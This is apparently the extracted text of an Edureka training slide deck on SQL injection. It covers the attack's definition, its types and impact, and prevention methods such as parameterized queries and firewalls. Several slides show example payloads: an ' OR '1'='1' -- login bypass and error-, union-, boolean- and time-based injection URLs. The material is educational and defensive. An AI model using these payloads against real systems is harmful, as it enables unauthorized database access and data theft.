Uploaded byEdureka!
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybersecurity Training | Edureka
The document outlines cybersecurity certification training focused on application security, particularly targeting SQL injection attacks. It explains what SQL injection is, its types, and the potential impacts, including extracting sensitive information and deleting data. It also provides prevention strategies such as static and dynamic testing, using parameterized queries, and implementing web-application firewalls.
More Related Content
Similar to What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybersecurity Training | Edureka
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybersecurity Training | Edureka
- 1. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training
- 2. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Agenda What is Application Security? What is SQL Injection Attack? Types of SQL Injection Attacks Demo - SQL Injection Attack types Prevention of SQL Injection attack 01 02 03 04 05
- 3. Copyright © 2019,edureka and/or its affiliates. All rights reserved. Application Security
- 4. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Cybersecurity Application Security Network Security Information Security Operational Security Disaster Recovery End-user Education Cyber security refers to the body of technologies, processes, and practices designed to protect networks, devices, programs, and data from attack, damage, or unauthorized access.
- 5. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Web Application Vulnerabilities Application Security Application security is the use of software, hardware, and procedural methods to protect applications from external threats. 0% 10% 20% 30% 40% 50% 0.06% 0.19% 0.63% 1.69% 2.19% 2.19% 2.44% 2.75% 8.63% 9.69% 18.01% 4.57% 46.97% Denial of Service XML External Entity Open Direct General Bypass Authentication Bypass Remote File Inclusion Full Path Disclosure Remote Code Execution Local File Inclusion Cross Site Request Forgery File Upload SQL Injection Cross Site Scripting
- 6. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training
- 7. Copyright © 2019,edureka and/or its affiliates. All rights reserved. What is SQL Injection?
- 8. Front End: HTML,CSS, JavaScript The need for more advanced technology and dynamic websites grew. Database: MySQL, Oracle, MongoDB Back End: .NET, PHP, Ruby, Python In the early days of internet, building websites was pretty straightforward
- 9. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training What is SQL Injection? A SQL query is in one way an application interacts with database An SQL Injection occurs when an application fails to sanitize the user input data An attacker can use specially crafted SQL commands to control web application’s database server
- 10. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training SQL Injection Attack – Non Technical Explanation Drive through <route> and <where should the bus stop?> if <when should the bus stop?>. Sample populated form Drive through route77 and stop at the bus stop if there are people at the bus stop Drive through route77 and do not stop at the bus stop and ignore the rest of the from. if there are people at the bus stop
- 11. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training SQL Injection Attack – Technical Explanation Sample SQL statement $statement = “SELECT * FROM users WHERE username = ‘$user’ AND password = ‘$password‘“; $statement = “SELECT * FROM users WHERE username = ‘Dean’ AND password = ‘WinchesterS’“; Sample SQL Injection Condition that will always be true, thereby it is accepted as a valid input by the application Instructs the SQL parser that the rest of the line is a comment and should not be executed $statement = “SELECT * FROM users WHERE username = ‘Dean OR ‘1’=‘1’ --‘AND password = ‘WinchesterS’“;
- 12. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Impact of SQL Injection Attack Extract sensitive information Misusing authentication details Delete data and drop tables
- 13. Copyright © 2019,edureka and/or its affiliates. All rights reserved. Types of SQL Injection
- 14. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Categories of SQL Injection SQL Injection Error-based Union-based In-Band SQLi Blind SQLi Out-of-bound SQLi Boolean-based Time-based
- 15. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Error BasedError Based Types of SQL Injection Error-based SQL Injection Union-based SQL Injection Union Based Boolean Based Time Based Out-of-bound https://example.com/index.php?id=1 AND SELECT "mysql" UNION SELECT @@version https://example.com/index.php?id=1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false) https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)) Out-of-boundTime BasedUnion Based Boolean Based
- 16. Copyright © 2019,edureka and/or its affiliates. All rights reserved. Demo – Types of SQL Injection
- 17. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training Preventing SQL Injection Performing static and dynamic testing Using parameterized queries and ORMs Using escape characters in SQL queries Enforcing least privilege on database Enabling web-application firewalls
- 18. Copyright © 2019,edureka and/or its affiliates. All rights reserved. Exploiting SQL Vulnerability in Application
- 19. Cybersecurity Certification Trainingwww.edureka.co/cybersecurity-certification-training